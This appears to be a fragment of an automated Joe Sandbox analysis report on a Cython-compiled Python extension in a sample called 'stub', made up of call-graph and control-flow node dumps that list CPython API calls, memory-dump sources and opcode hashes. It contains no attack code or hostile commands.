11036->11038 11039 7ffbaaf1750d PyErr_SetString 11037->11039 11041 7ffbaaf1753a 11037->11041 11038->11037 11039->11030 11040 7ffbaaf17afa _Py_Dealloc 11040->11030 11041->11030 11042 7ffbaaf17572 _Py_Dealloc 11041->11042 11043 7ffbaaf17578 11041->11043 11042->11043 11044 7ffbaaf17585 PyErr_SetString 11043->11044 11045 7ffbaaf175b2 11043->11045 11044->11030 11045->11030 11046 7ffbaaf175f0 11045->11046 11047 7ffbaaf175ea _Py_Dealloc 11045->11047 11048 7ffbaaf175fd PyErr_SetString 11046->11048 11049 7ffbaaf1762a 11046->11049 11047->11046 11048->11030 11049->11030 11050 7ffbaaf17662 _Py_Dealloc 11049->11050 11051 7ffbaaf17668 11049->11051 11050->11051 11052 7ffbaaf17675 PyErr_SetString 11051->11052 11053 7ffbaaf176a2 11051->11053 11052->11030 11053->11030 11054 7ffbaaf1771e 11053->11054 11055 7ffbaaf176e6 PyErr_Format 11053->11055 11056 7ffbaaf1772e 11054->11056 11057 7ffbaaf17728 _Py_Dealloc 11054->11057 11055->11075 11058 7ffbaaf1773b PyErr_SetString 11056->11058 11059 7ffbaaf17768 11056->11059 11057->11056 11058->11030 11059->11030 11060 7ffbaaf177a0 _Py_Dealloc 11059->11060 11061 7ffbaaf177a6 11059->11061 11060->11061 11062 7ffbaaf177b3 PyErr_SetString 11061->11062 11063 7ffbaaf177e0 11061->11063 11062->11030 11063->11030 11064 7ffbaaf1781e 11063->11064 11065 7ffbaaf17818 _Py_Dealloc 11063->11065 11066 7ffbaaf1782b PyErr_SetString 11064->11066 11067 7ffbaaf17858 11064->11067 11065->11064 11066->11030 11067->11030 11068 7ffbaaf17890 _Py_Dealloc 11067->11068 11069 7ffbaaf17896 11067->11069 11068->11069 11070 7ffbaaf178a3 PyErr_SetString 11069->11070 11071 7ffbaaf178d0 11069->11071 11070->11030 11071->11030 11072 7ffbaaf1795a PyObject_GetAttr 11071->11072 11073 7ffbaaf17955 11071->11073 11072->11073 11073->11030 11074 7ffbaaf179a4 PyObject_GetAttr 11073->11074 11076 7ffbaaf1799f 11073->11076 11074->11076 11075->11030 11075->11040 11076->11075 11077 7ffbaaf179de _Py_Dealloc 11076->11077 11078 7ffbaaf179e7 11076->11078 11077->11078 11079 7ffbaaf179f0 PyErr_SetString 11078->11079 11080 7ffbaaf17a1d 11078->11080 11079->11075 11080->11075 11081 7ffbaaf17a79 _Py_Dealloc 11080->11081 11083 7ffbaaf17a82 11080->11083 11081->11083 11082 7ffbaaf17ac6 11085 7ffbaaf17acc _Py_Dealloc 11082->11085 11086 7ffbaaf17ad5 11082->11086 11083->11082 11084 7ffbaaf17abd _Py_Dealloc 11083->11084 11084->11082 11085->11086 11086->11075 11087 7ffbaaf17b18 11086->11087 11088 7ffbaaf17b1f _Py_Dealloc 11087->11088 11089 7ffbaaf17b28 11087->11089 11088->11089 11089->11030 11090 7ffbaaf17b2e _Py_Dealloc 11089->11090 11090->11030 11091 7ffbaaf113e3 11092 7ffbaaf1144b PyDict_Size 11091->11092 11093 7ffbaaf11466 11092->11093 11094 7ffbaaf11940 PyErr_Occurred 11093->11094 11095 7ffbaaf1195b 11093->11095 11101 7ffbaaf116e5 11093->11101 11094->11095 11094->11101 11096 7ffbaaf1197a PyErr_Occurred 11095->11096 11097 7ffbaaf11995 11095->11097 11096->11097 11096->11101 11099 7ffbaaf119b3 PyErr_Occurred 11097->11099 11100 7ffbaaf119ce 11097->11100 11098 7ffbaaf11a08 11102 7ffbaaf11a52 11098->11102 11103 7ffbaaf11a47 PyObject_IsTrue 11098->11103 11108 7ffbaaf11a72 11098->11108 11099->11100 11099->11101 11100->11098 11104 7ffbaaf119ed PyErr_Occurred 11100->11104 11105 7ffbaaf11a57 PyErr_Occurred 11102->11105 11102->11108 11103->11102 11104->11098 11104->11101 11105->11101 11105->11108 11106 7ffbaaf11aa5 11107 7ffbaaf11ad4 11106->11107 11111 7ffbaaf11ab9 PyErr_Occurred 11106->11111 11112 7ffbaaf11c40 11107->11112 11108->11106 11110 7ffbaaf11a8a PyErr_Occurred 11108->11110 11110->11101 11110->11106 11111->11101 11111->11107 11113 7ffbaaf11cdc 11112->11113 11114 7ffbaaf11cfd _Py_Dealloc 11113->11114 11115 7ffbaaf11d06 11113->11115 11129 7ffbaaf11ce1 11113->11129 11114->11115 11116 7ffbaaf11d1d 11115->11116 11117 7ffbaaf11d7e _PyDict_GetItem_KnownHash 11115->11117 11119 7ffbaaf25c40 7 API calls 11116->11119 11120 7ffbaaf11d29 11116->11120 11118 7ffbaaf11dbe PyErr_Occurred 11117->11118 11117->11120 11118->11120 11121 7ffbaaf11d4b 11119->11121 11122 7ffbaaf11e1b PyObject_IsTrue 11120->11122 11123 7ffbaaf11e26 11120->11123 11120->11129 11121->11120 11124 7ffbaaf11d57 PyErr_Occurred 11121->11124 11122->11123 11125 7ffbaaf11e6d 11123->11125 11126 7ffbaaf11e33 11123->11126 11124->11120 11127 7ffbaaf11d62 PyErr_Format 11124->11127 11125->11129 11130 7ffbaaf11e72 _Py_Dealloc 11125->11130 11128 7ffbaaf11e49 _Py_Dealloc 11126->11128 11126->11129 11127->11120 11128->11129 11129->11101 11130->11129 11291 7ffbaaf0dff0 11292 7ffbaaf0e05c PyLong_FromLong 11291->11292 11293 7ffbaaf0e016 11291->11293 11294 7ffbaaf0e094 PyLong_FromLong 11292->11294 11302 7ffbaaf0e083 11292->11302 11293->11292 11296 7ffbaaf0e022 11293->11296 11295 7ffbaaf0e0c3 11294->11295 11297 7ffbaaf0e0a5 11294->11297 11298 7ffbaaf0e100 11295->11298 11300 7ffbaaf0e0fa _Py_Dealloc 11295->11300 11299 7ffbaaf0e183 _Py_Dealloc 11297->11299 11297->11302 11301 7ffbaaf0e145 11298->11301 11303 7ffbaaf0e13c _Py_Dealloc 11298->11303 11299->11302 11300->11298 11304 7ffbaaf0e14b _Py_Dealloc 11301->11304 11305 7ffbaaf0e154 11301->11305 11303->11301 11304->11305 11306 7ffbaaf0e15b _Py_Dealloc 11305->11306 11307 7ffbaaf0e164 11305->11307 11306->11307 11307->11297 11308 7ffbaaf0e1a4 11307->11308 11308->11302 11309 7ffbaaf0e1aa _Py_Dealloc 11308->11309 11309->11302 8228 7ffbaaf2ba70 8229 7ffbaaf2ba81 PyImport_ImportModule 8228->8229 8230 7ffbaaf2bb29 8228->8230 8231 7ffbaaf2ba93 PyErr_WriteUnraisable PyErr_WarnEx 8229->8231 8235 7ffbaaf2babe 8229->8235 8232 7ffbaaf2babc 8231->8232 8233 7ffbaaf2bad5 8231->8233 8234 7ffbaaf2baee PyImport_ImportModule 8232->8234 8236 7ffbaaf2bb00 8234->8236 8237 7ffbaaf2bb23 PyErr_Clear 8234->8237 8235->8233 8235->8234 8238 7ffbaaf2bae5 _Py_Dealloc 8235->8238 8236->8237 8239 7ffbaaf2bb0d 8236->8239 8237->8230 8238->8234 8239->8230 8240 7ffbaaf2bb13 _Py_Dealloc 8239->8240 11310 7ffbaaf28ff0 11311 7ffbaaf29015 11310->11311 11312 7ffbaaf29005 11310->11312 11313 7ffbaaf29031 PyList_New 11311->11313 11315 7ffbaaf290f7 11311->11315 11314 7ffbaaf29056 PyImport_ImportModuleLevelObject 11313->11314 11313->11315 11316 7ffbaaf2908e _Py_Dealloc 11314->11316 11317 7ffbaaf29097 11314->11317 11316->11317 11318 7ffbaaf290de PyErr_Clear 11317->11318 11319 7ffbaaf290b6 PyObject_GetAttr 11317->11319 11320 7ffbaaf290b2 11317->11320 11318->11315 11319->11320 11321 7ffbaaf290d2 11320->11321 11322 7ffbaaf290c9 _Py_Dealloc 11320->11322 11321->11315 11321->11318 11322->11321 11323 7ffbaaf297f0 11324 7ffbaaf29814 11323->11324 11325 7ffbaaf2981a PyErr_Format 11324->11325 11326 7ffbaaf29856 11324->11326 11328 7ffbaaf29894 11326->11328 11329 7ffbaaf29877 PyErr_Format 11326->11329 11329->11328 11330 7ffbaaf1fff5 _Py_Dealloc 11331 7ffbaaf2000c PyList_New 11330->11331 11332 7ffbaaf20003 _Py_Dealloc 11330->11332 11333 7ffbaaf2001f 11331->11333 11332->11331 11494 7ffbaaf06b34 11495 7ffbaaf06b8f PyDict_Size 11494->11495 11496 7ffbaaf06ba5 11495->11496 11497 7ffbaaf2a800 11498 7ffbaaf2a84c 11497->11498 11499 7ffbaaf2a81a 11497->11499 11500 7ffbaaf2a851 11498->11500 11501 7ffbaaf2a873 _PyThreadState_UncheckedGet 11498->11501 11499->11501 11504 7ffbaaf2a828 PyErr_SetString 11499->11504 11502 7ffbaaf2a866 11500->11502 11503 7ffbaaf2a856 PyErr_SetNone 11500->11503 11506 7ffbaaf2a88c 11501->11506 11503->11502 11505 7ffbaaf2a918 11506->11505 11507 7ffbaaf2a912 _Py_Dealloc 11506->11507 11507->11505 12738 7ffbaaf074b0 12739 7ffbaaf07b20 PyList_New 12738->12739 12740 7ffbaaf07b76 PyTuple_New 12739->12740 12785 7ffbaaf07b66 12739->12785 12744 7ffbaaf07b9a 12740->12744 12740->12785 12741 7ffbaaf081ec 12743 7ffbaaf081f8 _Py_Dealloc 12741->12743 12788 7ffbaaf08201 12741->12788 12742 7ffbaaf081e6 _Py_Dealloc 12742->12741 12743->12788 12745 7ffbaaf07bf8 _Py_Dealloc 12744->12745 12746 7ffbaaf07bfe PyTuple_New 12744->12746 12744->12785 12745->12746 12751 7ffbaaf07c22 12746->12751 12746->12785 12747 7ffbaaf08248 12748 7ffbaaf08276 12747->12748 12749 7ffbaaf0826d _Py_Dealloc 12747->12749 12749->12748 12750 7ffbaaf0823f _Py_Dealloc 12750->12747 12752 7ffbaaf07c86 PyTuple_New 12751->12752 12753 7ffbaaf07c80 _Py_Dealloc 12751->12753 12751->12785 12754 7ffbaaf07caa 12752->12754 12752->12785 12753->12752 12755 7ffbaaf07d08 _Py_Dealloc 12754->12755 12756 7ffbaaf07d0e PyTuple_New 12754->12756 12754->12785 12755->12756 12757 7ffbaaf07d32 12756->12757 12756->12785 12758 7ffbaaf07d96 PyTuple_New 12757->12758 12759 7ffbaaf07d90 _Py_Dealloc 12757->12759 12757->12785 12760 7ffbaaf07dba 12758->12760 12758->12785 12759->12758 12761 7ffbaaf07e18 _Py_Dealloc 12760->12761 12762 7ffbaaf07e1e PyTuple_New 12760->12762 12760->12785 12761->12762 12763 7ffbaaf07e42 12762->12763 12762->12785 12764 7ffbaaf07ea6 PyTuple_New 12763->12764 12765 7ffbaaf07ea0 _Py_Dealloc 12763->12765 12763->12785 12766 7ffbaaf07eca 12764->12766 12764->12785 12765->12764 12767 7ffbaaf07f28 _Py_Dealloc 12766->12767 12768 7ffbaaf07f2e PyTuple_New 12766->12768 12766->12785 12767->12768 12769 7ffbaaf07f52 12768->12769 12768->12785 12770 7ffbaaf07fb6 PyTuple_New 12769->12770 12771 7ffbaaf07fb0 _Py_Dealloc 12769->12771 12769->12785 12772 7ffbaaf07fda 12770->12772 12770->12785 12771->12770 12773 7ffbaaf08038 _Py_Dealloc 12772->12773 12774 7ffbaaf0803e PyTuple_New 12772->12774 12772->12785 12773->12774 12775 7ffbaaf08062 12774->12775 12774->12785 12776 7ffbaaf080c0 _Py_Dealloc 12775->12776 12777 7ffbaaf080c6 12775->12777 12775->12785 12776->12777 12778 7ffbaaf08112 _Py_Dealloc 12777->12778 12779 7ffbaaf08118 PyUnicode_Join 12777->12779 12777->12785 12778->12779 12780 7ffbaaf08148 12779->12780 12779->12785 12781 7ffbaaf0814f _Py_Dealloc 12780->12781 12782 7ffbaaf08158 12780->12782 12781->12782 12783 7ffbaaf08189 PyNumber_Add 12782->12783 12784 7ffbaaf0817e PyUnicode_Concat 12782->12784 12786 7ffbaaf08192 12783->12786 12784->12786 12785->12741 12785->12742 12786->12785 12787 7ffbaaf0821f 12786->12787 12787->12788 12789 7ffbaaf08229 _Py_Dealloc 12787->12789 12788->12747 12788->12750 12789->12788 11508 7ffbaaf1f00a 11509 7ffbaaf1f2f0 11508->11509 11510 7ffbaaf25953 11509->11510 11511 7ffbaaf1f348 _Py_Dealloc 11509->11511 11511->11510 11832 7ffbaaf0b810 11833 7ffbaaf0b874 PyObject_Init PyObject_GC_Track 11832->11833 11834 7ffbaaf0b8bd 11832->11834 11833->11834 11835 7ffbaaf0b9b2 _Py_Dealloc 11834->11835 11836 7ffbaaf0b9b8 11834->11836 11845 7ffbaaf0ba3b 11834->11845 11835->11836 11837 7ffbaaf0b9cd _Py_Dealloc 11836->11837 11838 7ffbaaf0b9d3 11836->11838 11837->11838 11839 7ffbaaf0b9eb 11838->11839 11840 7ffbaaf0b9e5 _Py_Dealloc 11838->11840 11841 7ffbaaf0ba01 _Py_Dealloc 11839->11841 11844 7ffbaaf0ba07 11839->11844 11840->11839 11841->11844 11842 7ffbaaf0bb5f 11843 7ffbaaf0bb56 _Py_Dealloc 11843->11842 11844->11845 11846 7ffbaaf0ba5b 11844->11846 11847 7ffbaaf0ba55 _Py_Dealloc 11844->11847 11845->11842 11845->11843 11848 7ffbaaf0ba74 _Py_Dealloc 11846->11848 11849 7ffbaaf0ba7a 11846->11849 11847->11846 11848->11849 11849->11845 11850 7ffbaaf0bac8 _Py_Dealloc 11849->11850 11851 7ffbaaf0bace 11849->11851 11850->11851 11851->11845 11852 7ffbaaf0bb1c _Py_Dealloc 11851->11852 11852->11845 11853 7ffbaaf0f410 11854 7ffbaaf0f465 11853->11854 11856 7ffbaaf0f45d 11853->11856 11855 7ffbaaf0f4fd PyErr_Format 11854->11855 11861 7ffbaaf0f46f 11854->11861 11862 7ffbaaf0f4d4 11855->11862 11856->11854 11859 7ffbaaf0f4e5 PyErr_Occurred 11856->11859 11856->11861 11857 7ffbaaf0f58f PyObject_IsTrue 11858 7ffbaaf0f59a 11857->11858 11860 7ffbaaf0f59f PyErr_Occurred 11858->11860 11858->11862 11859->11855 11859->11862 11860->11862 11861->11857 11861->11858 11861->11862 11863 7ffbaaf28c10 11864 7ffbaaf28c3d 11863->11864 11865 7ffbaaf28c1c PyErr_SetString 11863->11865 11864->11865 11867 7ffbaaf28c56 11864->11867 11868 7ffbaaf28c72 11867->11868 11869 7ffbaaf28c6c _Py_Dealloc 11867->11869 11869->11868

                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                                                                                                    • Disassembly available
                                                                                                                                                                                                                                    callgraph 0 Function_00007FFBAAF2D39E 1 Function_00007FFBAAF273A0 2 Function_00007FFBAAF227A0 3 Function_00007FFBAAF18FA0 4 Function_00007FFBAAF12BA0 39 Function_00007FFBAAF2A3D0 4->39 92 Function_00007FFBAAF27830 4->92 93 Function_00007FFBAAF26830 4->93 100 Function_00007FFBAAF25C40 4->100 5 Function_00007FFBAAF17FA0 6 Function_00007FFBAAF2B7A0 7 Function_00007FFBAAF2B3A0 8 Function_00007FFBAAF2BBA0 9 Function_00007FFBAAF223A3 10 Function_00007FFBAAF1F3A5 11 Function_00007FFBAAF21FA7 12 Function_00007FFBAAF2DBA7 13 Function_00007FFBAAF2D7A7 14 Function_00007FFBAAF06B8A 15 Function_00007FFBAAF21BAB 16 Function_00007FFBAAF26BB0 17 Function_00007FFBAAF25BB0 18 Function_00007FFBAAF217AF 19 Function_00007FFBAAF28FB0 20 Function_00007FFBAAF02B82 21 Function_00007FFBAAF01F81 22 Function_00007FFBAAF2C3BA 23 Function_00007FFBAAF03379 24 Function_00007FFBAAF26FC0 25 Function_00007FFBAAF06375 26 Function_00007FFBAAF0AFC0 26->16 26->100 27 Function_00007FFBAAB8217C 108 Function_00007FFBAAB821BC 27->108 28 Function_00007FFBAAF217C2 29 Function_00007FFBAAF20BC1 30 Function_00007FFBAAF2B7C0 31 Function_00007FFBAAF2CFC0 32 Function_00007FFBAAF0136C 33 Function_00007FFBAAF1F7CB 34 Function_00007FFBAAF18FD0 35 Function_00007FFBAAF1E3D0 36 Function_00007FFBAAF173D0 37 Function_00007FFBAAF04764 38 Function_00007FFBAAF227D2 40 Function_00007FFBAAF28BD0 41 Function_00007FFBAAF20BD4 42 Function_00007FFBAAF21BD4 43 Function_00007FFBAAF223D5 44 Function_00007FFBAAF03F5E 45 Function_00007FFBAAF157D7 45->100 46 Function_00007FFBAAF217D8 47 Function_00007FFBAAF207D7 48 Function_00007FFBAAF2D3DA 49 Function_00007FFBAAF1FFDA 50 Function_00007FFBAAF20FE0 51 Function_00007FFBAAF0DFE0 52 Function_00007FFBAAF0BFE0 53 Function_00007FFBAAF16FE0 53->36 54 Function_00007FFBAAF2CBDF 55 Function_00007FFBAAF317E0 56 Function_00007FFBAAF113E3 101 Function_00007FFBAAF11C40 56->101 57 Function_00007FFBAAF213E5 58 Function_00007FFBAAF02748 59 Function_00007FFBAAF0DFF0 60 Function_00007FFBAA7FBC74 61 Function_00007FFBAAF28FF0 62 Function_00007FFBAAF297F0 63 Function_00007FFBAAF1FFF5 64 Function_00007FFBAAF2DBFA 65 Function_00007FFBAAF2C7FD 66 Function_00007FFBAAF1F7FF 67 Function_00007FFBAAF06B34 68 Function_00007FFBAAF2A800 69 Function_00007FFBAAF20804 70 Function_00007FFBAAF02B30 71 Function_00007FFBAAF1F00A 72 Function_00007FFBAAF0532C 73 Function_00007FFBAAF0172C 74 Function_00007FFBAAF2D00D 75 Function_00007FFBAAF2D80E 76 Function_00007FFBAAF2080E 77 Function_00007FFBAAF2040D 78 Function_00007FFBAAF03B26 79 Function_00007FFBAAF05B26 80 Function_00007FFBAAF0B810 81 Function_00007FFBAAF0F410 82 Function_00007FFBAAF28C10 83 Function_00007FFBAAF2C010 84 Function_00007FFBAAF1F414 85 Function_00007FFBAAF27420 86 Function_00007FFBAAF25C20 87 Function_00007FFBAAF28820 88 Function_00007FFBAAF2B820 89 Function_00007FFBAAF06311 90 Function_00007FFBAAF11C27 90->100 91 Function_00007FFBAAF2D427 94 Function_00007FFBAAF1FC30 95 Function_00007FFBAAF1F42F 96 Function_00007FFBAA7FB5B4 96->60 97 Function_00007FFBAAF2B430 98 Function_00007FFBAAF1F038 99 Function_00007FFBAAF1F838 100->39 101->100 102 Function_00007FFBAAF2C442 103 Function_00007FFBAAF23041 104 Function_00007FFBAAF2B840 105 Function_00007FFBAAF2CC40 106 Function_00007FFBAAF22C45 107 Function_00007FFBAAF2BA70 109 Function_00007FFBAAF074B0

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 00007FFBAAF2BA70 Relevance: 17.5, APIs: 7, Strings: 3, Instructions: 48COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_7ffbaaf00000_stub.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Err_$DeallocImportImport_Module$ClearUnraisableWarnWrite
                                                                                                                                                                                                                                    • String ID: Cython module failed to register with collections.abc module$backports_abc$collections.abc
                                                                                                                                                                                                                                    • API String ID: 3055409517-3167216013
                                                                                                                                                                                                                                    • Opcode ID: 32d2d8ebaf427c9915a4c14e45b7913cd146b6d879e27b526b4b3a765f1a64f7
                                                                                                                                                                                                                                    • Instruction ID: 0afebd9395481130e2dd6dabcea5760373902b981ba5268088ab2b8858b3a2d7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32d2d8ebaf427c9915a4c14e45b7913cd146b6d879e27b526b4b3a765f1a64f7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4411BFA0E0B603C1FF5EAB71EC652B56298AF54B56F4410B5CD1DC6290EE3FA44B8730

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 00007FFBAAF173D0 Relevance: 63.4, APIs: 31, Strings: 5, Instructions: 437COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 5936 7ffbaaf173d0-7ffbaaf173ef 5937 7ffbaaf1741e-7ffbaaf17431 call 7ffbaaf25e50 5936->5937 5938 7ffbaaf173f1-7ffbaaf17419 PyErr_SetString 5936->5938 5944 7ffbaaf17433-7ffbaaf17444 5937->5944 5945 7ffbaaf17449-7ffbaaf17451 5937->5945 5939 7ffbaaf17b00-7ffbaaf17b16 call 7ffbaaf29db0 5938->5939 5946 7ffbaaf17b41-7ffbaaf17b53 5939->5946 5944->5939 5947 7ffbaaf17453 _Py_Dealloc 5945->5947 5948 7ffbaaf17459-7ffbaaf17464 5945->5948 5947->5948 5949 7ffbaaf17493-7ffbaaf174a9 call 7ffbaaf25e50 5948->5949 5950 7ffbaaf17466-7ffbaaf1748e PyErr_SetString 5948->5950 5953 7ffbaaf174ab-7ffbaaf174bc 5949->5953 5954 7ffbaaf174c1-7ffbaaf174ce call 7ffbaaf2a130 5949->5954 5950->5939 5953->5939 5957 7ffbaaf174d0-7ffbaaf174d9 PyErr_Occurred 5954->5957 5958 7ffbaaf174f1-7ffbaaf174f6 5954->5958 5957->5958 5959 7ffbaaf174db-7ffbaaf174ec 5957->5959 5960 7ffbaaf17501-7ffbaaf1750b 5958->5960 5961 7ffbaaf174f8-7ffbaaf174fb _Py_Dealloc 5958->5961 5962 7ffbaaf17af0-7ffbaaf17af5 5959->5962 5963 7ffbaaf1750d-7ffbaaf17535 PyErr_SetString 5960->5963 5964 7ffbaaf1753a-7ffbaaf17550 call 7ffbaaf25e50 5960->5964 5961->5960 5962->5939 5965 7ffbaaf17af7 5962->5965 5963->5939 5969 7ffbaaf17552-7ffbaaf17563 5964->5969 5970 7ffbaaf17568-7ffbaaf17570 5964->5970 5967 7ffbaaf17afa _Py_Dealloc 5965->5967 5967->5939 5969->5939 5971 7ffbaaf17572 _Py_Dealloc 5970->5971 5972 7ffbaaf17578-7ffbaaf17583 5970->5972 5971->5972 5973 7ffbaaf175b2-7ffbaaf175c8 call 7ffbaaf25e50 5972->5973 5974 7ffbaaf17585-7ffbaaf175ad PyErr_SetString 5972->5974 5977 7ffbaaf175e0-7ffbaaf175e8 5973->5977 5978 7ffbaaf175ca-7ffbaaf175db 5973->5978 5974->5939 5979 7ffbaaf175f0-7ffbaaf175fb 5977->5979 5980 7ffbaaf175ea _Py_Dealloc 5977->5980 5978->5939 5981 7ffbaaf175fd-7ffbaaf17625 PyErr_SetString 5979->5981 5982 7ffbaaf1762a-7ffbaaf17640 call 7ffbaaf25e50 5979->5982 5980->5979 5981->5939 5985 7ffbaaf17642-7ffbaaf17653 5982->5985 5986 7ffbaaf17658-7ffbaaf17660 5982->5986 5985->5939 5987 7ffbaaf17662 _Py_Dealloc 5986->5987 5988 7ffbaaf17668-7ffbaaf17673 5986->5988 5987->5988 5989 7ffbaaf176a2-7ffbaaf176b8 call 7ffbaaf25e50 5988->5989 5990 7ffbaaf17675-7ffbaaf1769d PyErr_SetString 5988->5990 5993 7ffbaaf176d0-7ffbaaf176db 5989->5993 5994 7ffbaaf176ba-7ffbaaf176cb 5989->5994 5990->5939 5995 7ffbaaf176dd-7ffbaaf176e4 5993->5995 5996 7ffbaaf1771e-7ffbaaf17726 5993->5996 5994->5939 5995->5996 5997 7ffbaaf176e6-7ffbaaf17719 PyErr_Format 5995->5997 5998 7ffbaaf1772e-7ffbaaf17739 5996->5998 5999 7ffbaaf17728 _Py_Dealloc 5996->5999 5997->5962 6000 7ffbaaf1773b-7ffbaaf17763 PyErr_SetString 5998->6000 6001 7ffbaaf17768-7ffbaaf1777e call 7ffbaaf25e50 5998->6001 5999->5998 6000->5939 6004 7ffbaaf17780-7ffbaaf17791 6001->6004 6005 7ffbaaf17796-7ffbaaf1779e 6001->6005 6004->5939 6006 7ffbaaf177a0 _Py_Dealloc 6005->6006 6007 7ffbaaf177a6-7ffbaaf177b1 6005->6007 6006->6007 6008 7ffbaaf177e0-7ffbaaf177f6 call 7ffbaaf25e50 6007->6008 6009 7ffbaaf177b3-7ffbaaf177db PyErr_SetString 6007->6009 6012 7ffbaaf1780e-7ffbaaf17816 6008->6012 6013 7ffbaaf177f8-7ffbaaf17809 6008->6013 6009->5939 6014 7ffbaaf1781e-7ffbaaf17829 6012->6014 6015 7ffbaaf17818 _Py_Dealloc 6012->6015 6013->5939 6016 7ffbaaf1782b-7ffbaaf17853 PyErr_SetString 6014->6016 6017 7ffbaaf17858-7ffbaaf1786e call 7ffbaaf25e50 6014->6017 6015->6014 6016->5939 6020 7ffbaaf17870-7ffbaaf17881 6017->6020 6021 7ffbaaf17886-7ffbaaf1788e 6017->6021 6020->5939 6022 7ffbaaf17890 _Py_Dealloc 6021->6022 6023 7ffbaaf17896-7ffbaaf178a1 6021->6023 6022->6023 6024 7ffbaaf178d0-7ffbaaf178d8 6023->6024 6025 7ffbaaf178a3-7ffbaaf178cb PyErr_SetString 6023->6025 6026 7ffbaaf178f0-7ffbaaf178f9 6024->6026 6027 7ffbaaf178da-7ffbaaf178eb 6024->6027 6025->5939 6028 7ffbaaf178fb-7ffbaaf17914 call 7ffbaaf27a60 6026->6028 6029 7ffbaaf1792c-7ffbaaf1792e 6026->6029 6027->5939 6028->6029 6036 7ffbaaf17916-7ffbaaf17927 6028->6036 6031 7ffbaaf17934-7ffbaaf17953 6029->6031 6032 7ffbaaf17b37-7ffbaaf17b3e 6029->6032 6034 7ffbaaf17955-7ffbaaf17958 6031->6034 6035 7ffbaaf1795a PyObject_GetAttr 6031->6035 6032->5946 6037 7ffbaaf17960-7ffbaaf17966 6034->6037 6035->6037 6036->5939 6038 7ffbaaf1797e-7ffbaaf1799d 6037->6038 6039 7ffbaaf17968-7ffbaaf17979 6037->6039 6041 7ffbaaf1799f-7ffbaaf179a2 6038->6041 6042 7ffbaaf179a4 PyObject_GetAttr 6038->6042 6039->5939 6043 7ffbaaf179aa-7ffbaaf179b3 6041->6043 6042->6043 6045 7ffbaaf179b5-7ffbaaf179ca 6043->6045 6046 7ffbaaf179d8-7ffbaaf179dc 6043->6046 6045->5939 6047 7ffbaaf179d0-7ffbaaf179d3 6045->6047 6048 7ffbaaf179de-7ffbaaf179e1 _Py_Dealloc 6046->6048 6049 7ffbaaf179e7-7ffbaaf179ee 6046->6049 6047->5967 6048->6049 6050 7ffbaaf17a1d-7ffbaaf17a33 call 7ffbaaf25e50 6049->6050 6051 7ffbaaf179f0-7ffbaaf17a18 PyErr_SetString 6049->6051 6054 7ffbaaf17a4b-7ffbaaf17a5d 6050->6054 6055 7ffbaaf17a35-7ffbaaf17a46 6050->6055 6051->5962 6056 7ffbaaf17a5f-7ffbaaf17a66 6054->6056 6057 7ffbaaf17a8a-7ffbaaf17ab5 call 7ffbaaf27060 6054->6057 6055->5962 6056->6057 6058 7ffbaaf17a68-7ffbaaf17a77 6056->6058 6063 7ffbaaf17ac6-7ffbaaf17aca 6057->6063 6064 7ffbaaf17ab7-7ffbaaf17abb 6057->6064 6060 7ffbaaf17a82-7ffbaaf17a87 6058->6060 6061 7ffbaaf17a79-7ffbaaf17a7c _Py_Dealloc 6058->6061 6060->6057 6061->6060 6066 7ffbaaf17acc-7ffbaaf17acf _Py_Dealloc 6063->6066 6067 7ffbaaf17ad5-7ffbaaf17ad8 6063->6067 6064->6063 6065 7ffbaaf17abd-7ffbaaf17ac0 _Py_Dealloc 6064->6065 6065->6063 6066->6067 6068 7ffbaaf17b18-7ffbaaf17b1d 6067->6068 6069 7ffbaaf17ada-7ffbaaf17aee 6067->6069 6070 7ffbaaf17b1f-7ffbaaf17b22 _Py_Dealloc 6068->6070 6071 7ffbaaf17b28-7ffbaaf17b2c 6068->6071 6069->5939 6069->5962 6070->6071 6071->6032 6072 7ffbaaf17b2e-7ffbaaf17b31 _Py_Dealloc 6071->6072 6072->6032
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1962008991.00007FFBAAF01000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FFBAAF00000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1961973099.00007FFBAAF00000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962060335.00007FFBAAF34000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962091897.00007FFBAAF3F000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1962127369.00007FFBAAF44000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
